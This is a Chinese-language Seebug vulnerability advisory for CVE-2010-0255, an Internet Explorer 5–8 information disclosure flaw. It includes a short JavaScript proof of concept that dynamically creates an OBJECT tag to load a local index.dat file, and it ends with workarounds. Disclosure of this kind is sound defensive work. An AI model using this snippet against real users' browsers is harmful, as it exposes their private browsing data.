Lucene search

K
seebugRootSSV:19063
HistoryFeb 04, 2010 - 12:00 a.m.

Microsoft IE动态OBJECT标签信息泄露漏洞

2010-02-0400:00:00
Root
www.seebug.org
28

0.962 High

EPSS

Percentile

99.4%

BUGTRAQ ID: 38055
CVE ID: CVE-2010-0255

Internet Explorer是Windows操作系统中默认捆绑的web浏览器。

Internet Explorer在加载OBJECT标签中所指定内容时如果index.dat文件直接从类似于以下的网页引用的话,则不会渲染和显示该文件的内容:

/-----
<object data="file://127.0.0.1/C$/…/index.dat"
type="text/html"
width="100%" height="50"
</object>

  • -----/

但如果使用类似于以下的HTML代码就会加载并渲染该文件:

/-----
<script language="Javascript">
var obj = document.createElement("object");
obj.data = "file://127.0.0.1/C$/…/index.dat";
obj.type = "text/html";
obj.id = "obj_results";
obj.width = "500px";
obj.height = "300px";
document.body.appendChild(obj);
</script>

  • -----/

Microsoft Internet Explorer 8.0
Microsoft Internet Explorer 7.0
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
Microsoft Internet Explorer 5.0.1 SP4
厂商补丁:

Microsoft

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.microsoft.com/windows/ie/default.asp


                                                * 将Internet Explorer配置为在Internet和本地Intranet安全区域中运行ActiveX控件和活动脚本之前进行提示。
* 将Internet 和本地Intranet安全区域设置设为“高”,以便在这些区域中运行ActiveX控件和活动脚本之前进行提示。
* 对Windows XP启用Internet Explorer网络协议锁定。